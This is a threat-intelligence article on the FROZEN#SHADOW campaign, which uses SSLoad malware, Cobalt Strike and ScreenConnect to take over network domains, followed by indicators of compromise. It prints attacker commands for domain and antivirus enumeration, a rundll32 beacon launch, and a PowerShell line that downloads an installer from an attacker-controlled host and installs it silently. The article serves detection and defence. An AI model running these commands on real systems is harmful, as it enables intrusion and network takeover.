SSLoad Malware Combined with Tools Hijacks Entire Network Domain

The FROZEN#SHADOW attack campaign employs SSLoad malware alongside Cobalt Strike Implants to seize control of the entire network. Additionally, threat actors utilize Remote Monitoring and Management (RMM) software like ScreenConnect for enhanced control.

SSLoad Malware

SSLoad is a sophisticated malware adept at silently breaching systems, extracting sensitive data, and transmitting it to malicious operators. Additionally, it employs various backdoors and payloads to elude detection and sustain persistence.

The new attack campaign begins with a conventional phishing email containing a malicious link. Upon clicking, users are redirected to the mmtixmm[.]org URL, leading to another download site where a JavaScript file is downloaded to the victim’s machine.

If manually executed, the JavaScript file initiates several operations, downloading and executing additional payloads on the victim’s machine.

The phishing email campaigns appear to target victims randomly across multiple countries, including Asia, Europe, and the Americas.

Further analysis of the malware uncovered a multi-stage attack process:

Stage 1: Initial Execution – JavaScript

Stage 2: Execution of MSI File

Stage 3: Malware Execution

Stage 4: Cobalt Strike Execution

Stage 5: Utilization of RMM Software & Lateral Movement

Stage 1: Initial Execution – JavaScript

In the initial stage, the JavaScript file is manually executed.

Upon analysis of the JS file out_czlrh.js, it was found to comprise 97.6% commented code with random characters, obscuring the file.

However, removing the commented code unveiled clear JS code devoid of obfuscation.

Analyzing the JS code revealed it begins by creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject. Subsequently, the code attempts to access the WMI Object for basic command line operations with “GetObject(“winmgmts:\\.\root\cimv2″).”

Additionally, the code establishes variables to manage connection attempts and gather the connection status of a network share.

Moreover, it maps all available drives to a network share located at \wireoneinternet[.]info@80\share.

The script then executes the “net use” command via WMI to correctly map the network drive.

After a three-second delay, it repeats the command to confirm the mapping.

Upon successful completion of these steps, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.

Stage 2: MSI Execution

The slack.msi file resembles the BazarBackdoor, commonly associated with the TrickBot malware group.

Upon execution, the malware communicates with several domains:

• wireoneinternet[.]info
• skinnyjeanso[.]com
• titnovacrion[.]top
• Maramaravilha[.]com
• globalsolutionunlimitedltd[.]com

Furthermore, only after this, the SSLoad malware is downloaded and executed.

SSLoad’s payloads include a DLL file with a semi-random name, typically found in %APPDATA%\local\digistamp\mbae-api-na.dll.

This DLL is then executed by Rundll32.exe, after which it copies itself to %APPDATA%\Custom_update.

Stage 3: Malware Execution

Additionally, during the rundll32.exe execution, communication is initiated with two preconfigured C2 servers: hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/. Subsequently, the malware begins collecting system and user data for the local host and domain using cmd.exe commands.

• exe /c ipconfig /all
• exe /c systeminfo
• exe /c nltest /domain_trusts
• exe /c nltest /domain_trusts /all_trusts
• exe /c net view /all /domain
• exe /c net view /all
• exe /c net group “domain admins” /domain
• exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
• exe /c net config workstation
• exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
• exe /c whoami /groups

The gathered information is transmitted to the C2 servers via HTTPS connections. Upon receiving this data from the infected system, threat actors verify its legitimacy before executing manual commands. These commands include:

• exe -c “[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding(‘utf-8’); cd c:; powershell”
• exe /groups
• exe group “domain admins” /dom
• exe /node:localhost /namespace:\root\securitycenter2 path antivirusproduct get * /format:list

These commands are used to manipulate and explore the server environment for the subsequent stages of malware activities.

Stage 4: Cobalt Strike Beacon

This stage of the malware involves deploying the Cobalt Strike beacon on systems after executing manual commands.

Once deployed, this beacon becomes the primary communication tool for the C2. However, it is dropped and executed via the following rundll32.exe command:

Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq

Additionally, threat actors utilized Cobalt Strike to download and install a ScreenConnect RMM software instance on the victim system using these commands:

• exe /c whoami /groups
• exe /c wmic /node:localhost /namespace:\root\securitycenter2 path antivirusproduct get * /format:list
• exe /c iwr -uri “hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=” -outfile c:\programdata\msedgeview.msi
• exe /c systeminfo
• exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn

Stage 5: RMM Software And Lateral Movement

Every compromised system is managed using the ScreenConnect RMM Software to maintain complete control.

Following this, lateral movement occurs by harvesting credentials and critical system details.

Environment enumeration is conducted using PowerShell commands like Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer.

Credential extraction is performed, potentially allowing access to a domain admin account NTLM hash.

Indicators Of Compromise

C2 Address

• 85.239.54[.]190
• 23.159.160[.]88
• 23.95.209[.]148
• 45.95.11[.]134
• bjSdg0.pintaexoticfashion.co[.]in
• l1-03.winupdate.us[.]to
• 23-95-209-148-host.colocrossing[.]com:443
• mmtixmm[.]org
• wireoneinternet[.]info
• skinnyjeanso[.]com
• titnovacrion[.]top
• simplyfitphilly[.]com
• kasnackamarch[.]info
• sokingscrosshotel[.]com
• danteshpk[.]com
• stratimasesstr[.]com
• winarkamaps[.]com
• globalsolutionunlimitedltd[.]com
• maramaravilha[.]com
• krd6[.]com
• hxxps://t0talwar.screenconnect[.]com

File Name	SHA256
out_czlrh.js	DB265EA1732935F61E8D0F7A20A8ADC54E20AF71B3CF4A737714CD3377C838F6
out_bdrts.js	FAD25892E5179A346CDBDBBA1E40F53BD6366806D32B57FA4D7946EBE9AE8621
Letter_c89_00c568610-93e92634a4425-2643w5.js	F8FC9B40B946B742D6044F291914439727E1A7F53EA87562446F682B26CCE65A
Letter_p64_18t678677-53r17785m9284-51810.js	E8979741F0355A47DAE575EAD8C829DF47F282B4533EC1BE4D63086515F9C449
Letter_h85_79o750478-05f74851h3126-2101c9.js	08E82F1C0A033AB295B4D342C53970E4528E20933C614BDA3BBC5D57BAB20651
Letter_e97_58z949277-25h33503u6712-8630h9.js	4F52B4A2A781F366ED534D8C4B2FAFEF48A7848C4C20B4229B98747CA8AB06D3
Letter_n95_52a858194-29r719420963-6497k0.js	68E1CAF530366B1890993185157C01161B3D625063D75A41C88D2D1BB8EDFE02
Letter_n54_61h288642-67072023a7462-0068w3.js	6D7A94B7551F15732E193A07357375B98B463F0DCE6B1FED871A42FCBDDE9F48
Letter_w54_49a010638-34d3814907559-826708.js	2B026343214C3D2C10FDFA9B04B7694E57EE8D3605FBF9A2E127FE6FA9A58309
Letter_a51_80q687203-83q18993e4985-2463m8.js	96212917B7B0DC881332DB7ECE0BACFE21D9AC713AF1ABE078F6D3E74BAACD01
Letter_k40_07w820587-40d85841n3311-9847w6.js	BA3FA920708DB856737A66F70E2C7E86BBA73C73836F7F30C2CE42CD70D0C5BD
Letter_w45_72u406742-64b48323u0125-6834a8.js	7DBEBB7C76511FC063B5ACE0A9359B655F66A55A494200B8FD11905C78B5FB90
Letter_c41_84a683017-72b44707a1598-464809.js	6E892AA13CBD4B71A1C476207ABDDB1EF830BE04999809B4EF569488A37E47E0
Letter_d94_87w030300-54q44583y8818-2571b1.js	7DFF08656413A737483ECEE2A50E412338EBFEE3D36A1A5C04E74B25949B2306
Letter_n42_88u446059-37f35802c4925-3726c4.js	75DB4709428310C76656BF76F5DE267AB490E43284312B374BAF7582108300A9
Letter_q50_63b944998-11n0283407179-6803z4.js	C172ABD808CC6216B309BC307FE69B821C7EAED35F874FD4684AB33B4291F95A
Letter_u79_20w517865-65u0451500340-7186n6.js	5FB093A9348FCF4A81BEFDA978C948796A8319FCABE7899C2CF5BA1419EC9D35
Doc_k33_80c092144-18b83503a0451-2328f3.js	9FC48724CB9F70F774F7ED9E809E49979BD089DFD641896D8D5E3026F049B0AF
Doc_d43_77n194090-93d18260r9745-8376n8.js	C122596E25A4DAD1D46D4AB983F4EF15BFA7B65582B7C311F404036766498105
Doc_i93_65b929565-14q83944h2246-4336m9.js	E8E76B851FC78D87FE58AD7D29BC6356A8965236D1B96C5F572334DD695D5DE9
Doc_f98_58y658432-41b75184w6866-3921d1.js	791C28D4201E8B9EA5162FBEE3908FEB34793B1C51F5AAEDC43916E86068248D
Doc_q80_66b246938-8806024o9126-5008b9.js	CAF8295570E8A8244C7099A8EABFD1BD55EA50F026B4461E9F0F5425D54703E8
Doc_m42_81h118103-88o62135w8623-1999q9.js	092962BC268390DEBF17CD148D03147CDF919E442E61C92DE01EAC3BDB34B1C1
Doc_q35_64r067638-76a88713i3606-7493z7.js	24CB279EEBCD49E1327905AB2BD19B9B2E09EFA3E0A5E1875F3989C398A5DA81
Letter_a53_97o318845-76f99823h9630-6740o2.js	8F7A90B540F38712C9C1A5359C6333BBE1091102D6F621B22321E08352C84CFC
Letter_d94_87w030300-54q44583y8818-2571b1.js	7DFF08656413A737483ECEE2A50E412338EBFEE3D36A1A5C04E74B25949B2306
Letter_e79_76r514120-22p50913h4206-6851k8.js	0737FA0B403FAB17331C9835497A4F3B2955543E2FAC85009DCC66DF41A015F8
Letter_h21_36b948317-03a99748y3026-8660b8.js	2118C5B95D5D57492B2E8B8C0403E23B21ACC4FF50282F8B6007BA89ADFAA992
Letter_d19_97q517001-52z26072a2831-7463c5.js	A557F891F4D50E458D745C7EAF7D0BE3ECEEA36F0398097E977CD3F6EC463875
Letter_t47_39u197519-27b72941k6563-0250a2.js	4D9274CFE7A2BD9A125352271D1634708E1F9B1D70B056D1C1950CB98B8F91FF
Letter_z27_59o257127-14z25707d6443-0555c6.js	3584CA9C1E7E0A38E47F59BB16C21203A60833D0F826294D535A98E7CA76D9C1
Letter_b42_17m561933-22h44391r3880-8554u2.js	63283E012F067A3FFB27ED4FE6803F740C80F6F65213FE5507F0CD1EE0019B96
Letter_t48_42a243569-81n19660f9965-6999u0.js	828EF3E4CA064891836913015C48AC9807ECD43B32F6E7E4BFF29B9FD2E218C9
Letter_o40_58g357086-56q83656a4371-9752z1.js	780B970DAD15835D138546BE9B615FC1B4124C1060A8EFD91B9C52F9C3160D5B
	09E7F7428E6ECC68EF036C0751F53985882F6760CF3892F1D26AF44F3B9730DE
msedgeview.msi	232F8F8DC9E5B9723C43C78CB942CC810EF56E305E4BD650110A484334F568A8
950b84.msi	F5BF914415FAF7587958BBDC3312536FD9ABEA647F1541D44D2E757F0E683650
6838aa.msi	08075E8A6DCC6A5FCA089348EDBD5FC07B2B0B26A26A46E0DD401121FDAA88D3
4178fc.msi	FF5E40FC794E56FD78FEB6EB6B30794970F7CDB4A767C4095E2D20A90BB0EFE8
slack.msi	B9DBE9649C761B0EEE38419AC39DCD7E90486EE34CD0EB56ADDE6B2F645F2960
qual.msi	EE1E5B80A1D3D47C7703EA2B6B64EE96283AB3628EE4FA1FEF6D35D1D9051E9F
avp.msi	DCAE57EC4B69236146F744C143C42CC8BDAC9DA6E991904E6DBF67EC1179286A
msedge.dll	7018C43EE38190EAE122797869865FD808817F31D766575B43B118AE176C0C68
Update_c7e5e126.dll	FC21A125287C3539E11408587BCAA6F3B54784D9D458FACBC54994F05D7EF1B0
Update_2ffaca76.dll	65DA6D9F781FF5FC2865B8850CFA64993B36F00151387FDCE25859781C1EB711
Update_8d74674.dll	805B59E48AF90504024F70124D850870A69B822B8E34D1EE551353C42A338BF7
Update_17a3b1e7.dll	7206EAFC475F246E7C9C258AFDAAA64B5193C1C7427D927BE417E53DEC890078
mbae-api-na.dll	9856B816A9D14D3B7DB32F30B07624E4BCDA7F1E265A7BB7A3E3476BFD54A759 0EDE3CBE821E4F083FC119274F069C77E64A6A7E8A2C16530317B826A0939979 17DDC339B14845BC9D67C5C3CD9A0E617387CC0569131FF3641035D82043EFFA 18D60C9C807DA021BC2C31E3BA7EC2737865A8C96060134CAA3CF033E43E26FE AE610EB8F8622653B9BE9692A7D2A680B0C2154022704CA58AF0EAEED0066D03 7F97ADFF1D298CCF1F3C7991FCB01008DDA22722EBBC11AF48FCBF2ADB58AFB4
forcedelctl.dll	3BCA1DCAEF4430272B9029C9A4BC8BE0D45ECFF66E8DE8679ED30D8AFAB00F6F

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!